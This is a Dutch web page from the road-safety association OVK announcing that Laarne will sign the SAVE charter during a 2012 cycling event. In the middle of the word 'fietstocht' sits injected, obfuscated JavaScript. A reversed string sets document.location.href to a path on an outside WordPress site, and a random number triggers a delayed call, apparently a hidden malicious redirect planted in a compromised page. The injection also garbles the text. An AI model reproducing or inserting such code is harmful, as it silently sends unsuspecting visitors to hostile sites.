Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Laarne ondertekent het SAVE-charter

Op zondag 17 juni ondertekent het gemeentebestuur van Laarne het SAVE-charter voor Steden & Gemeenten. Hiermee zal Laarne de 10de Vlaamse gemeente zijn die het charter ondertekent, sinds de start van het project. Het gemeentebestuur van Laarne geeft een duidelijk signaal: de gemeente zal zich actief inzetten voor meer verkeersveiligheid.

Het charter wordt ondertekend op het slotfeest van de actie ‘met belgerinkel naar de winkel’. Om 14 uur vertrekt er een begeleide fietstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tocht aan het gemeentehuis van Laarne (Dorpsstraat 2, Laarne) naar de dorpskern van de deelgemeente Kalken (Nerenweg 3, Laarne). De verwachte aankomst in Kalken is ongeveer 15 uur. Hier wordt dan het slotmoment van de actie ‘met belgerinkel naar de winkel’ afgesloten door de plechtige ondertekening van het SAVE-charter. Door deze twee evenementen aan elkaar te koppelen wil het gemeentebestuur van Laarne een duidelijk signaal geven dat ze zal blijven investeren in acties die gericht zijn op de verbetering van de verkeersveiligheid.

U wordt vriendelijk uitgenodigd om de ondertekening van het SAVE-charter bij te wonen op zondag 17 juni 2012.


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be